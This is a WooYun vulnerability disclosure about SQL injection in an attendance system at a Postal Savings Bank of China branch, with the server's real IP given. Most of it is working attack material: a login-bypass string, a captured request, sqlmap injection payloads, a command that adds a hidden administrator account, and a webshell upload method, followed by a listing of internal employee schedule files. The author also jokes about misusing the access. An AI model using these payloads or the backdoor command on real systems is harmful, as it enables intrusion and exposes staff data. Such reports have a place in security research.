当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139606

漏洞标题:中国邮政储蓄银行某站点SQl注入导致getshell(数十个单位上千员工信息泄露&已登录远程桌面)

相关厂商:中国邮政储蓄银行

漏洞作者: 默之

提交时间:2015-09-07 23:27

修复时间:2015-09-12 23:28

公开时间:2015-09-12 23:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-07: 细节已通知厂商并且等待厂商处理中
2015-09-12: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

SQL注入~是由一个软件造成的

详细说明:

先介绍一下这款考勤软件,永益web考勤管理系统,目前市场份额挺小的,不过还是有个别用户使用,这个系统存在通用的登陆框处注入漏洞(因为没有找到更多的例子,所以就不能提交了)
网址:http://59.46.94.68/ 中国邮政储蓄银行股份有限公司沈阳分公司

页面.png


#1 SQL注入
(1)在txtusername处存在注入
账号admin'or'1'='1 密码:任意6位拼写

登陆界面.png


找到人员管理,包含数十个单位的上千名员工信息,还有员工的工号。PS:领导就是好,还是免签组的人,你们分行谁想免签,我可以帮一下~

人员信息.png


人数.png


(2)配合sqlmap的--os-shell,顺利拿下远程访问
登陆的时候抓包如下

POST /Login.aspx?ReturnUrl=%2fLogout.aspx HTTP/1.1
Host: 59.46.94.68
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-MicrosoftAjax: Delta=true
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Referer: http://59.46.94.68/Login.aspx?ReturnUrl=%2fLogout.aspx
Content-Length: 380
Cookie: kaoqinv3=ACC9FB1D7A5E580C1CFF5EE6BA21ECF1E61AAA8C8C74A7C2F86DDDA0C94B93AAA2153160D9465E564FB744167D6CD68612936BB588CBEC6ED58773AA4A2B536EA85989F822D80BA99C3A219CD1B422F3AB2C5BA644FB5CE784A24CD006AE45A0498843190371C88D80075B83111E1E35B56BFCB4
Connection: keep-alive
Pragma: no-cache
ScriptManager1=UpdatePanel1%7CibtLogin&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTU4NDM0NjE3MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCGlidExvZ2luLn8eh5CQyvecM2BwkDNNnGPM%2B8k%3D&__EVENTVALIDATION=%2FwEWBAKo%2F4yuDQKl1bKzCQK1qbSRCwKr8tnHBlWbJX1knDRzqPvDAtsW69fz%2Fei6&txtUserName=admin*&txtPassword=admin&__ASYNCPOST=true&ibtLogin.x=42&ibtLogin.y=18


丢到sqlmap跑出来的数据

sqlmap identified the following injection points with a total of 258 HTTP(s) req
uests:
---
Place: (custom) POST
Parameter: #1*
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: ScriptManager1=UpdatePanel1|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT
=&__VIEWSTATE=/wEPDwUKMTU4NDM0NjE3MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV
9fFgEFCGlidExvZ2luLn8eh5CQyvecM2BwkDNNnGPM+8k%3D&__EVENTVALIDATION=/wEWBAKo/4yuD
QKl1bKzCQK1qbSRCwKr8tnHBlWbJX1knDRzqPvDAtsW69fz/ei6&txtUserName=admin' AND 1059=
CONVERT(INT,(CHAR(58)+CHAR(117)+CHAR(113)+CHAR(100)+CHAR(58)+(SELECT (CASE WHEN
(1059=1059) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(122)+CHAR(112)+CHAR(
98)+CHAR(58))) AND 'WFpz'='WFpz&txtPassword=admin&__ASYNCPOST=true&ibtLogin.x=42
&ibtLogin.y=18
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: ScriptManager1=UpdatePanel1|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT
=&__VIEWSTATE=/wEPDwUKMTU4NDM0NjE3MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV
9fFgEFCGlidExvZ2luLn8eh5CQyvecM2BwkDNNnGPM+8k%3D&__EVENTVALIDATION=/wEWBAKo/4yuD
QKl1bKzCQK1qbSRCwKr8tnHBlWbJX1knDRzqPvDAtsW69fz/ei6&txtUserName=-2201' UNION ALL
SELECT CHAR(58)+CHAR(117)+CHAR(113)+CHAR(100)+CHAR(58)+CHAR(106)+CHAR(65)+CHAR(
108)+CHAR(99)+CHAR(68)+CHAR(85)+CHAR(108)+CHAR(66)+CHAR(88)+CHAR(98)+CHAR(58)+CH
AR(122)+CHAR(112)+CHAR(98)+CHAR(58)-- &txtPassword=admin&__ASYNCPOST=true&ibtLog
in.x=42&ibtLogin.y=18
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: ScriptManager1=UpdatePanel1|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT
=&__VIEWSTATE=/wEPDwUKMTU4NDM0NjE3MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV
9fFgEFCGlidExvZ2luLn8eh5CQyvecM2BwkDNNnGPM+8k%3D&__EVENTVALIDATION=/wEWBAKo/4yuD
QKl1bKzCQK1qbSRCwKr8tnHBlWbJX1knDRzqPvDAtsW69fz/ei6&txtUserName=admin'; WAITFOR
DELAY '0:0:5'--&txtPassword=admin&__ASYNCPOST=true&ibtLogin.x=42&ibtLogin.y=18
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: ScriptManager1=UpdatePanel1|ibtLogin&__EVENTTARGET=&__EVENTARGUMENT
=&__VIEWSTATE=/wEPDwUKMTU4NDM0NjE3MmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV
9fFgEFCGlidExvZ2luLn8eh5CQyvecM2BwkDNNnGPM+8k%3D&__EVENTVALIDATION=/wEWBAKo/4yuD
QKl1bKzCQK1qbSRCwKr8tnHBlWbJX1knDRzqPvDAtsW69fz/ei6&txtUserName=admin' WAITFOR D
ELAY '0:0:5'--&txtPassword=admin&__ASYNCPOST=true&ibtLogin.x=42&ibtLogin.y=18
---
[20:20:15] [INFO] testing MySQL
[20:20:20] [WARNING] the back-end DBMS is not MySQL
[20:20:20] [INFO] testing Oracle
[20:20:24] [WARNING] the back-end DBMS is not Oracle
[20:20:24] [INFO] testing PostgreSQL
[20:20:28] [WARNING] the back-end DBMS is not PostgreSQL
[20:20:28] [INFO] testing Microsoft SQL Server
[20:20:32] [INFO] confirming Microsoft SQL Server
[20:20:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
[20:20:44] [INFO] fetched data logged to text files under 'C:\Python27\sqlmappro
ject-sqlmap-b5060c0\output\59.46.94.68'


下面使用sqlmap的--os-shell添加用户,刚开始使用net user命令,竟然没有返回数据,那就试试

net user temp temp /add & net localgroup administrators temp /add


依然返回数据为空,不过没关系,命令已经执行了登陆之

添加用户.png


远程桌面.png


ip.png


这个服务器主要就是一个打卡考勤的服务器,没有别的网站在上面,翻看了一下,找到了一个给内部ic卡充值的软件,密码也有,这要是让内部员工得到之后,天天就不愁吃了

充值.png

漏洞证明:

#2 Getshell
登录系统之后找到请假管理,里面有一个上传的页面,直接抓包,修改后缀,发包,就可以得到shell

上传.png


shell.png


一些敏感信息泄露
在一个配置文件里找到了这个,hash值,但是我没有破解成功

<publisherIdentity name="CN=CZP-T420\Administrator" issuerKeyHash="3b66588d735daf22d864c47625964970ecc9047a" /><Signature Id="StrongNameSignature" xmlns="http://www.w3.org/2000/09/xmldsig#"><SignedInfo><CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /><SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1" /><Reference URI=""><Transforms><Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature" /><Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#" /></Transforms><DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"


当然也连上了数据库

数据库.png


#3 目录遍历

59.46.94.68 - /data/ImportExcel/Employee/
[To Parent Directory]
2015年5月30日 19:08 9955 1.xlsx
2014年9月29日 10:02 13824 10月2.xls
2014年9月30日 10:36 17408 10月一支导入排班1.xlsx.xls
2014年9月30日 16:36 11776 10月于洪广场支行导入排班.xlsx.xlsx
2014年10月17日 8:21 17408 10月于洪支行导入排班1.xlsx.xls
2014年9月30日 13:31 19456 10月于洪沙岭支行导入排班1.xlsx.xls
2014年10月31日 17:49 19398 10月导入排班.xlsx
2014年9月29日 10:00 16896 10月班表.xls
2014年9月29日 9:31 15360 10月班表.xlsx
2014年9月30日 16:31 26624 10月黄海路支行导入排班.xlsx.xlsx
2014年9月29日 11:37 12800 111.xls
2014年9月30日 10:33 11264 111110月一支导入排班1.xlsx.xls
2014年10月31日 17:22 11776 11月于洪广场导入排班1.xlsx.xls
2014年10月31日 9:53 11264 11月于洪支行导入排班1.xlsx - 副本.xls
2015年3月31日 20:27 19456 11月于洪沙岭支行导入排班1.xlsx.xls
2014年10月31日 22:13 11232 11月导入排班.xlsx
2014年10月22日 11:57 12800 11月导入班表.xls
2014年10月29日 14:00 17920 11月班表.xls
2014年10月31日 10:41 21504 11月黄海路支行导入排班.xlsx.xlsx
2014年12月1日 7:53 16896 12.xls
2014年12月2日 9:52 35840 12月.xls
2015年6月30日 14:36 13312 12月于洪广场导入排班1.xlsx.xls
2014年11月28日 15:07 11264 12月于洪支行导入排班1.xlsx.xls
2014年12月3日 15:55 19538 12月导入排班.xlsx
2014年11月29日 15:55 17920 12月班表.xls
2014年11月29日 23:38 20992 12月黄海路支行导入排班.xlsx.xlsx
2015年1月7日 9:21 13312 15.1月班表.xls
2015年1月29日 16:31 13824 15.2月班表.xls
2015年3月2日 8:31 14336 15.3月班表.xls
2015年4月2日 8:31 17920 15.4月班表.xls
2015年4月30日 7:53 18432 15.5月班表.xls
2015年5月29日 8:39 13824 15.6月班表.xls
2015年6月30日 14:01 14336 15.7月班表.xls
2015年8月28日 11:25 14336 15.9月班表.xls
2015年1月1日 12:49 19524 1月导入排班.xlsx
2014年11月11日 12:57 11776 201411.xls
2014年11月26日 9:14 12288 20141101.et
2014年11月1日 8:39 9344 201411月份 网点导入排班 .xlsx
2014年12月6日 13:45 12800 201412.xls
2014年12月6日 14:25 13312 2014121.et
2014年11月30日 11:22 9398 201412月份 网点导入排班.xlsx
2015年1月6日 12:40 10240 2015-1月导入排班.xls
2015年2月5日 13:32 10240 2015-2月导入排班.xls
2015年3月4日 8:26 10240 2015-3月导入排班.xls
2015年4月8日 15:26 10240 2015-4月导入排班.xls
2015年5月7日 15:19 10240 2015-5月导入排班.xls
2015年6月11日 8:44 10240 2015-6月导入排班.xls
2015年7月9日 14:18 10240 2015-7月导入排班.xls
2015年8月10日 8:07 10240 2015-8月导入排班.xls
2014年12月31日 11:30 14276 2015.1.xlsx
2015年1月6日 12:08 12800 201501.xls
2014年12月31日 9:21 9428 201501月份 网点导入排班.xlsx
2015年2月6日 14:37 13824 201502.xls
2015年1月30日 12:33 11099 201502月份 网点导入排班.xlsx
2015年1月31日 19:15 11062 201502月导入排班.xlsx
2015年3月31日 15:51 16896 201503.xls
2015年2月26日 8:41 11235 201503月份 网点导入排班.xlsx
2015年2月28日 18:28 11233 201503月导入排班.xlsx
2015年4月14日 9:51 17408 201504.xls
2015年4月26日 13:38 12027 201504月份 网点导入排班.xlsx
2015年5月6日 13:51 13312 201505.xls
2015年5月10日 13:06 12062 201505月份 网点导入排班.xlsx
2015年6月9日 10:04 13824 201506.xls
2015年5月31日 10:19 12034 201506月份 网点导入排班.xlsx
2015年7月4日 14:10 13824 201507.xls
2015年7月1日 9:29 11914 201507月份 网点导入排班.xlsx
2015年8月4日 13:12 14336 201508.xls
2015年7月31日 10:59 12102 201508月份 网点导入排班.xlsx
2015年9月3日 14:45 14336 201509.xls
2015年8月30日 9:13 12138 201509月份 网点导入排班.xlsx
2014年12月25日 18:43 26112 2015年1月份排班.xls
2014年12月31日 20:59 17408 2015年1月导入排班.xls
2014年12月31日 16:56 11264 2015年1月月于洪支行导入排班1.xlsx - 副本.xls
2015年2月2日 10:01 25088 2015年2月.xls
2015年1月30日 13:35 11264 2015年2月月于洪支行导入排班1.xlsx - 副本 - 副本.xls
2015年2月28日 14:22 27648 2015年3月.xls
2015年2月28日 10:55 11264 2015年3月于洪支行导入排班1.xlsx - 副本 - 副本 - 副本.xls
2015年2月25日 10:58 26624 2015年3月份排班.xls
2015年4月29日 14:24 27136 2015年4月.xls
2015年3月31日 16:10 11264 2015年4月于洪支行导入排班1.xlsx -.xls
2015年4月2日 17:47 26624 2015年4月份排班.xls
2015年4月29日 14:36 26624 2015年5月.xls
2015年4月30日 10:42 10752 2015年5月于洪支行导入排班1.xlsx - - 副本.xls
2015年4月21日 16:46 27136 2015年5月份排班.xls
2015年6月1日 16:54 27648 2015年6月.xls
2015年5月29日 8:46 10752 2015年6月于洪支行导入排班1.xlsx - - 副本 - 副本.xls
2015年5月26日 16:31 26624 2015年6月份排班.xls
2015年7月13日 12:09 28160 2015年7月.xls
2015年6月30日 13:43 10752 2015年7月于洪支行导入排班1.xlsx - - 副本 - 副本 - 副本.xls
2015年6月27日 11:06 26624 2015年7月份排班.xls
2015年7月30日 14:17 27648 2015年8月.xls
2015年8月3日 8:42 10752 2015年8月于洪支行导入排班1.xlsx.xls
2015年7月28日 16:48 26624 2015年8月份排班.xls
2015年9月1日 13:24 27648 2015年9月.xls
2015年9月1日 9:28 10752 2015年9月于洪支行导入排班1.xlsx.xls
2015年8月29日 14:42 27648 2015年9月份排班.xls
2015年2月3日 14:44 17424 2月导入排班.xlsx
2015年3月3日 16:21 18269 3月导入排班.xlsx
2015年4月27日 8:49 18179 4月导入排班.xlsx
2015年4月30日 19:57 14848 5.01.xls
2015年4月30日 17:59 19472 5月导入排班.xlsx
2015年7月30日 14:55 21829 8月导入排班.xlsx
2015年9月1日 13:52 31744 8月指纹班表.xls
2014年9月28日 15:30 14848 Book1.xls
2014年10月8日 9:48 13312 sheet1.xls
2015年4月26日 21:01 505856 于洪支行人员导入模板V3.0-201303.xls
2014年3月27日 19:34 15455 人员信息.xls
2013年5月9日 15:22 188928 人员导入模板.xls
2014年7月30日 11:17 83456 人员导入模板V3.0-201303.xls
2014年9月2日 11:22 11264 人员汇总(1).xls
2014年9月2日 10:17 563200 人员汇总.xls
2014年10月31日 14:11 13312 仙岛北路导入排班(11).xls
2014年11月29日 14:10 13312 仙岛北路导入排班(12).xls
2015年1月1日 11:32 13312 仙岛北路导入排班(1月).xls
2015年1月31日 13:57 19968 仙岛北路导入排班(2月).xls
2015年3月9日 10:35 13824 仙岛北路导入排班(3月) - 副本.xls
2015年2月25日 14:21 19968 仙岛北路导入排班(3月).xls
2015年3月31日 15:34 19456 仙岛北路导入排班(4月).xls
2015年4月30日 19:24 18432 仙岛北路导入排班(5月).xls
2015年5月30日 13:19 18944 仙岛北路导入排班(6月) -.xls
2015年6月30日 18:00 18944 仙岛北路导入排班(7月).xls
2015年7月30日 14:39 18432 仙岛北路导入排班(8月).xls
2015年8月28日 15:59 17920 仙岛北路导入排班(9月).xls
2014年10月29日 13:57 10240 仙岛北路导入排班1.xls
2015年1月5日 14:46 12800 侯帅.xls
2015年1月5日 14:46 11776 刘昊辰排版导入表1.xls
2014年9月30日 14:25 20480 北站支行10月份班表.xls
2014年10月31日 13:38 20480 北站支行11月份班表.xls
2014年11月28日 17:32 24064 北站支行12月份班表.xls
2014年10月31日 11:00 31232 县行机关导入排班1.xls
2014年12月31日 9:54 32256 县行机关导入排班11月.xls
2015年2月1日 11:43 27648 县行机关导入排班2015.2月.xls
2014年10月16日 9:56 12800 吉祥支行10月份班表.xls
2014年11月19日 13:55 13824 吉祥支行11月份班表.xls
2014年12月31日 9:07 13824 吉祥支行12月份班表.xls
2015年1月29日 13:25 14336 吉祥支行1月份班表.xls
2015年2月21日 16:29 13824 吉祥支行2月份班表.xls
2015年3月8日 16:30 14336 吉祥支行3月份班表.xls
2015年4月3日 12:04 13824 吉祥支行4月份班表.xls
2013年11月3日 17:24 10801 员工排班表.xls
2014年10月19日 8:53 9234 城北10月份 网点导入排班.xlsx
2014年12月31日 9:18 9428 城北1月份 网点导入排班.xlsx
2014年9月30日 14:05 11264 城北网点导入排班.xls
2014年12月3日 15:52 18158 复件 11月导入排班.xlsx
2014年10月31日 10:46 21504 复件 11月黄海路支行导入排班.xlsx.xlsx
2015年3月30日 15:56 13824 复件 15.4月班表.xls
2015年8月4日 15:33 14336 复件 15.8月班表.xls
2015年2月24日 9:49 26112 复件 2015年2月份排班.xls
2015年6月4日 14:21 21676 复件 5月导入排班.xlsx
2015年7月4日 11:02 21837 复件 6月导入排班.xlsx
2014年12月1日 14:51 12288 复件 县行机关导入排班11月.xls
2015年3月1日 21:17 30720 复件 县行机关导入排班2015.3月.xls
2015年3月31日 16:47 32256 复件 复件 县行机关导入排班20154月.xls
2015年4月30日 8:48 30720 复件 复件 复件 县行机关导入排班20155月.xls
2014年10月29日 15:29 9053 复件 导入排班1.xlsx
2015年1月31日 14:40 14336 复件 导入排班10.xls
2015年2月27日 14:47 17920 复件 导入排班3.xlsx(青年支行)03.xls
2015年6月1日 6:59 30720 复件 康平县行机关导入排班20156月.xls
2015年3月20日 16:18 14336 复件 长白支行班表.xls
2015年4月2日 9:30 32256 太原 导入排班太原支行3月(1).xls
2015年5月6日 17:05 31232 太原 导入排班太原支行4月(1).xls
2015年6月2日 15:36 30720 太原 导入排班太原支行5月(1).xls
2015年6月3日 14:08 35840 太原 导入排班太原支行5月(11).xls
2014年10月16日 15:04 10752 太原支行.xls
2014年9月30日 14:38 14848 导入排班-营业部.xls
2015年9月2日 8:56 30208 导入排班.xls
2015年2月3日 14:20 9821 导入排班.xlsx
2014年9月30日 14:25 10752 导入排班.xlsx.xls
2015年4月1日 16:11 16896 导入排班02.xlsx
2015年5月5日 9:11 16896 导入排班04.et
2015年6月12日 10:49 15360 导入排班05.et
2015年7月4日 15:38 16384 导入排班07.et
2015年8月6日 10:39 15872 导入排班08.et
2015年9月2日 17:18 15872 导入排班09.et
2015年8月30日 14:42 11776 导入排班1 - 副本.xls
2015年2月4日 13:18 15360 导入排班1.1.xls
2014年9月28日 18:21 4793 导入排班1.txt
2015年9月1日 8:05 29696 导入排班1.xls
2015年6月29日 15:25 12248 导入排班1.xlsx
2014年12月31日 16:42 15360 导入排班1.xlsx.et
2014年10月21日 13:41 12288 导入排班10.13.xls
2015年1月24日 9:58 10752 导入排班10.xls
2014年10月14日 9:13 13317 导入排班10.xlsx
2014年10月29日 10:22 11776 导入排班10月 - 张晓彤.xls
2014年10月30日 16:02 12288 导入排班10月.xls
2014年10月10日 10:52 11177 导入排班10月.xlsx
2015年1月29日 10:49 15360 导入排班11(1).xlsx
2015年1月12日 11:02 14848 导入排班11.xls
2015年2月26日 9:46 14848 导入排班11.xlsx
2014年11月19日 9:44 12288 导入排班11月 .xls
2014年11月1日 6:36 11483 导入排班11月.xlsx
2014年10月31日 14:01 9310 导入排班11月1.xlsx
2014年11月28日 15:00 27648 导入排班12.xls
2014年11月28日 15:03 14172 导入排班12.xlsx
2014年11月19日 9:45 11776 导入排班12月.xls
2014年12月1日 6:36 11465 导入排班12月.xlsx
2014年9月30日 15:56 10752 导入排班1新.xls
2014年12月31日 8:55 12288 导入排班1月.xls
2015年1月4日 9:03 12640 导入排班1月.xlsx
2014年10月31日 13:47 17408 导入排班2.xls
2014年9月30日 20:41 10491 导入排班2.xlsx
2015年2月23日 14:24 11392 导入排班201501.xlsx
2015年3月29日 12:42 11354 导入排班201503.xlsx
2015年4月28日 15:39 11509 导入排班201504.xlsx
2015年4月28日 15:40 11509 导入排班201505.xlsx
2015年5月30日 9:24 11497 导入排班201506.xlsx
2015年1月30日 9:35 12288 导入排班2月.xls
2014年10月15日 20:10 10739 导入排班3.xlsx
2014年10月8日 14:15 14336 导入排班3.xlsx(青年支行).xls
2014年12月29日 19:28 16896 导入排班3.xlsx(青年支行)01.xls
2015年1月27日 16:04 16384 导入排班3.xlsx(青年支行)02.xls
2014年10月31日 19:30 18944 导入排班3.xlsx(青年支行)11.xls
2014年11月29日 18:28 18944 导入排班3.xlsx(青年支行)12.xls
2015年2月27日 9:56 12288 导入排班3月.xls
2015年3月31日 8:23 12288 导入排班4月.xls
2015年3月31日 14:13 16896 导入排班4月.xlsx(青年支行)02.xls
2015年4月29日 12:42 17920 导入排班4月.xlsx(青年支行)05.xls
2015年5月5日 16:18 12288 导入排班5月.xls
2015年6月1日 14:23 12288 导入排班6月.xls
2015年5月28日 9:45 17920 导入排班6月.xlsx(青年支行).xls
2015年6月25日 13:41 11479 导入排班7.xlsx
2015年7月27日 9:25 12288 导入排班7月.xls
2015年7月3日 10:12 18432 导入排班7月.xlsx(青年支行).xls
2015年8月4日 17:07 18432 导入排班8.xls
2015年9月1日 15:00 16896 导入排班8月.xls
2015年7月29日 12:46 18432 导入排班8月.xlsx(青年支行).xls
2015年8月30日 14:14 11610 导入排班9.xlsx
2015年8月31日 15:26 12800 导入排班9月.xls
2015年8月29日 15:50 17408 导入排班9月.xlsx(青年支行).xls
2015年5月1日 13:59 16896 导入排班一月.xls
2015年7月29日 9:35 16896 导入排班七月.xls
2015年9月2日 9:32 67584 导入排班上传版(最新).xls
2015年2月6日 8:31 34304 导入排班上传版.xls
2014年10月31日 13:58 22528 导入排班北站支行.xls
2014年10月31日 13:53 22528 导入排班北站支行.xlsx
2014年10月31日 13:48 22528 导入排班北站支行.xlsx.xls
2014年10月31日 13:57 17408 导入排班十一月.xls
2014年12月1日 14:08 17920 导入排班十二月.xls
2015年7月3日 15:39 16896 导入排班十月.xls
2014年10月18日 15:57 10845 导入排班向工.xlsx
2014年11月16日 16:52 11061 导入排班向工11月.xlsx
2014年12月11日 10:35 11365 导入排班向工12月.xlsx
2015年1月1日 11:05 11058 导入排班向工2015年1月.xlsx
2015年2月1日 18:26 10987 导入排班向工2015年2月.xlsx
2015年3月7日 12:04 11164 导入排班向工2015年3月.xlsx
2015年4月3日 10:55 11125 导入排班向工2015年4月.xlsx
2014年12月18日 15:24 22016 导入排班太原支行.xls
2015年2月9日 8:46 23552 导入排班太原支行1月.xls
2015年3月4日 8:37 33792 导入排班太原支行2月(1).xls
2015年3月4日 8:45 33792 导入排班太原支行2月(11).xls
2015年3月4日 9:04 33792 导入排班太原支行2月(订).xls
2015年2月3日 8:22 32768 导入排班终级版.xls
2015年1月7日 13:28 62976 导入排班终级版1501.xls
2015年2月3日 8:13 97280 导入排班终级版2015.xls
2014年9月28日 16:34 8628 导入排班齐贤班表.xlsx
2014年12月5日 15:09 12288 导入排班齐贤班表12月份.xls
2014年11月30日 13:07 9602 导入排班齐贤班表12月份.xlsx
2015年3月8日 13:21 9905 导入排班齐贤班表1月份.xlsx
2015年3月29日 13:24 9962 导入排班齐贤班表4月份.xlsx
2015年5月3日 10:52 10007 导入排班齐贤班表5月份.xlsx
2015年6月4日 17:01 9949 导入排班齐贤班表6月份.xlsx
2015年7月1日 17:30 9947 导入排班齐贤班表7月份.xlsx
2015年7月15日 13:29 9978 导入排班齐贤班表8月份.xlsx
2015年2月13日 17:22 10649 导入排班(2月份).xlsx
2015年3月19日 14:19 11307 导入排班(3月份).xlsx
2015年5月7日 13:59 11797 导入排班(4月份).xlsx
2015年6月4日 15:43 17408 导入排班(5月份).xls
2015年5月17日 17:51 12225 导入排班(5月份).xlsx
2015年7月2日 11:09 18944 导入排班(6月份).xls
2015年8月3日 9:10 18432 导入排班(7月份).xls
2015年9月6日 12:24 18432 导入排班(8月份).xls
2015年9月6日 12:25 17920 导入排班(9月份).xls
2014年9月30日 15:22 9728 小北一路支行2014年10月1-12日排班表.xls
2015年8月6日 10:59 25088 工作簿2.xls
2015年7月1日 13:58 28672 康平县行机关导入排班20157月.xls
2015年8月3日 8:11 27136 康平县行机关导入排班20158月.xls
2015年9月2日 8:25 27648 康平县行机关导入排班20159月.xls
2014年9月30日 16:29 12800 康平城南10月导入排班.xls
2014年11月29日 9:42 13824 康平城南11月导入排班.xls
2014年11月30日 14:32 13312 康平城南12月导入排班.xls
2015年7月30日 16:53 13824 康平城南1月导入排班.xls
2015年1月31日 21:53 22528 康平城南2月导入排班.xls
2015年3月1日 20:02 22528 康平城南3月导入排班.xls
2015年3月31日 19:12 16384 康平城南4月导入排班.xls
2015年5月5日 10:22 15872 康平直属导入排班.xls
2014年11月29日 11:22 10836 康平直属导入排班.xlsx
2014年12月30日 16:48 15360 康平直属导入排班12.xls
2014年9月2日 13:30 11264 总.xls
2015年8月6日 10:53 31232 指纹班表.xls
2015年9月6日 10:49 12800 排班.xls
2015年2月28日 10:54 11076 排班.xlsx
2014年10月31日 9:54 16384 排班11月.xls
2015年2月12日 17:52 14336 排班2月份.et
2015年3月20日 14:12 15360 排班3月份.et
2015年4月4日 8:00 15872 排班4月份.et
2015年4月29日 17:33 15872 排班5月份.et
2015年5月29日 15:37 16384 排班6月份.et
2015年7月1日 9:38 16896 排班7月份.et
2015年7月29日 10:57 16384 排班8月份.et
2015年8月25日 15:30 15872 排班9月份.et
2014年8月29日 15:20 638976 支行部分.xls
2014年9月2日 9:12 165376 支行部分2.xls
2014年10月17日 13:19 12288 文官排版导入表.xls
2014年12月1日 9:19 10752 文官排版导入表1.xls
2014年11月25日 8:59 10752 文官排版导入表11调.xls
2014年10月13日 15:05 9016 文萃支行导入排班.xlsx
2014年10月19日 13:25 10122 文萃支行导入排班10月份.xlsx
2015年1月23日 13:46 10458 文萃模板导入排班2015年1月份班表.xlsx
2014年11月30日 17:41 11360 新12月导入排班.xlsx
2015年3月31日 20:44 11533 新201504导入排班.xlsx
2015年1月6日 13:06 17920 新城子营业部排班导入表.xls
2014年12月31日 11:44 27136 新建 Microsoft Excel 工作表.xls
2014年11月24日 14:23 9216 新建 Microsoft Word 文档.doc
2014年12月31日 9:06 25600 新民支行导入排班1.xls
2015年9月2日 10:59 25600 新民支行导入排班1201501.xls
2015年4月1日 18:06 26112 新民支行导入排班1201504.xls
2014年10月9日 16:03 11571 昆西导入排班10月.xlsx
2014年10月31日 18:56 11861 昆西导入排班11月.xlsx
2014年12月2日 15:49 12158 昆西导入排班12月.xlsx
2015年1月2日 11:11 11841 昆西导入排班1月(2015).xlsx
2015年2月6日 14:54 11728 昆西导入排班2月(2015).xlsx
2015年4月3日 11:26 11648 昆西导入排班3月(2015).xlsx
2015年3月30日 16:05 11456 昆西导入排班4月(2015).xlsx
2015年4月30日 14:17 10856 昆西导入排班4月(宛龄).xlsx
2015年4月29日 15:19 11656 昆西导入排班5月(2015).xlsx
2015年6月20日 13:42 10302 昆西导入排班6月(2015).xlsx
2015年7月18日 16:40 10484 昆西导入排班7月(2015).xlsx
2015年8月12日 12:24 11667 昆西导入排班8月(2015).xlsx
2015年9月7日 14:20 11759 昆西导入排班9月(2015).xlsx
2014年10月31日 14:23 8573 模板导入排班.xlsx
2014年10月31日 18:43 10065 模板导入排班11月份.xlsx
2014年12月29日 9:32 10035 模板导入排班12月份.xlsx
2014年12月1日 10:21 12800 民族导入排班1.xls
2014年9月2日 11:13 10183 汇总.xlsx
2014年10月14日 13:31 14336 沈辽考勤排班.xls
2015年6月3日 15:27 1757157 沈阳邮政储蓄银行考勤员使用说明文档.docx
2014年12月29日 20:59 9497 班表1月.xlsx
2014年10月8日 14:55 13312 白塔支行.xls
2014年10月8日 9:41 13312 白塔支行10月份排班表.xls
2014年10月8日 12:46 14848 直属导入排班1.xls
2015年8月31日 17:02 13824 直属排班表.et
2014年11月7日 16:06 9414 网点导入排班.xlsx
2015年8月28日 13:23 16896 考勤导入表.xls
2014年10月31日 12:23 15360 考勤表.xls
2014年10月8日 10:39 15360 苏家屯支行排班表.xls
2015年9月2日 15:33 13312 苏家屯支行班表.xls
2015年9月4日 16:21 15872 苏家屯直属排班表.xls
2014年9月30日 14:46 10786 营业部10月份导入排班.xlsx
2014年11月27日 11:02 10753 营业部11月份导入排班.xlsx
2014年11月27日 11:03 10857 营业部12月份导入排班.xlsx
2014年12月31日 13:46 10889 营业部1月份导入排班.xlsx
2015年2月13日 13:56 11257 营业部2月份导入排班.xlsx
2015年3月2日 9:50 11194 营业部3月份导入排班.xlsx
2015年4月15日 14:59 11326 营业部4月份导入排班.xlsx
2015年5月22日 8:45 11293 营业部5月份导入排班.xlsx
2015年7月1日 19:13 11317 营业部6月份导入排班.xlsx
2015年7月2日 18:41 11194 营业部7月份导入排班.xlsx
2015年8月27日 8:11 11030 营业部8月份导入排班.xlsx
2014年11月24日 9:45 9728 董重阳.xls
2015年1月5日 14:41 16384 蒲河支行排班导入表.xls
2014年11月24日 9:44 10752 调整排版导入表1.xls
2015年6月30日 16:03 14336 辽河大街导入排班1.xls
2015年8月31日 9:47 14848 辽河大街导入排班201508.xls
2014年9月2日 9:12 119296 部门部分2(1).xls
2014年9月2日 9:12 108544 部门部分2.xls
2014年8月29日 15:17 61440 部门部分汇总.xls
2015年4月30日 20:48 10916 重工北5月导入排班.xlsx
